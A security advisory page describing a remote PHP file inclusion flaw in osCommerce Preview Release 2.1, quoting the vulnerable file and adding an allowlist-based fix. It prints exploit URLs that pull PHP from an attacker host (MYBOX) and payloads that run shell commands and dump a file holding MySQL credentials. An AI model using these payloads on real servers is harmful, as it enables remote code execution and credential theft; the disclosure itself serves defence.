SecurityTracker.com

Category:   Application (Commerce)  >   osCommerce
Vendors:   osCommerce
osCommerce e-Commerce Shopping Cart Software Lets Remote Users Execute Arbitrary PHP Code and System Commands on the Server
SecurityTracker Alert ID:  1004562
SecurityTracker URL:  http://securitytracker.com/id/1004562
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Preview Release 2.1
Description:   An input validation hole was reported in the osCommerce online commerce software. A remote user can execute arbitrary PHP code, including arbitrary system commands, on the server.

The flaw is reportedly located in the '/catalog/includes/include_once.php' file. A remote user can specify a PHP file on a remote server to be included by this script.

A demonstration exploit URL is provided:

http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE

The remote user could send arbitrary queries to the underlying SQL server or could execute arbitrary shell commands on the system.

Some example exploits are described in the Source Message.

Impact:   A remote user can execute arbitrary PHP code on the system. The code will run with the privileges of the web PHP process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.oscommerce.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  PHP source injection in osCommerce




PHP source injection in osCommerce
----------------------------------

Product Description

osCommerce is an open source e-commerce solution under ongoing 
development by the open source community. Its feature packed 
out-of-the-box installation allows store owners to set up, run, and 
maintain their online stores with minimum effort and with no costs 
involved. It can be found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are a lot of online shops that use 
this)


The Problem

osCommerce comes with a file called /catalog/includes/include_once.php, 
and it looks like this:

-------- include_once.php --------
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
  }
?>
----------------------------------

If someone requests a URL like 
http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, 
he would be able to include any code he wants.

This could be a serious problem because this user could query the SQL 
server and get access to other important files...

Examples

-------- Example 1 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current directory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file, which includes MySQL username, 
password, ...
---------------------------

I informed the vendor and hope that they will release a patch soon.

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
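
The entry lists no solution. One way to close the hole, shown here as an added example that is not osCommerce code or a vendor patch, is to treat the supplied value as a key into a fixed allowlist instead of as a path. resolve_include(), the allowlist and the file names are hypothetical, and the demo files are constructed.

```php
<?php
// Hardened include helper (added example, not osCommerce code).
// resolve_include(), $allowed and the file names are hypothetical.

/**
 * Map a logical name to a file under $base, or return null.
 * The caller's input selects an allowlist entry; it never becomes a path.
 */
function resolve_include(string $name, array $allowed, string $base): ?string
{
    if (!isset($allowed[$name])) {
        return null;                       // unknown name, URL, traversal string ...
    }
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $allowed[$name]);
    if ($root === false || $path === false) {
        return null;                       // base or target does not exist
    }
    // realpath() has resolved ".." and symlinks; the result must stay under $root.
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary include directory with one allowed file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'header.php', '<?php echo "header loaded\n";');
$allowed = ['header' => 'header.php'];

// Constructed inputs: one valid name and the shapes of value the advisory describes.
$inputs = ['header', 'http://MYBOX/a.php', '../application_top.php', 'header.php'];
foreach ($inputs as $input) {
    $path = resolve_include($input, $allowed, $base);
    if ($path === null) {
        echo "rejected: $input\n";
        continue;
    }
    include_once $path;                    // only ever an allowlisted local file
}

unlink($base . DIRECTORY_SEPARATOR . 'header.php');
rmdir($base);
```

On PHP 5.2 and later, allow_url_include is Off by default and blocks the remote-URL form of this inclusion. It does not stop inclusion of local paths, so the allowlist check is still needed.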


 
 



Copyright 2022, SecurityGlobal.net LLC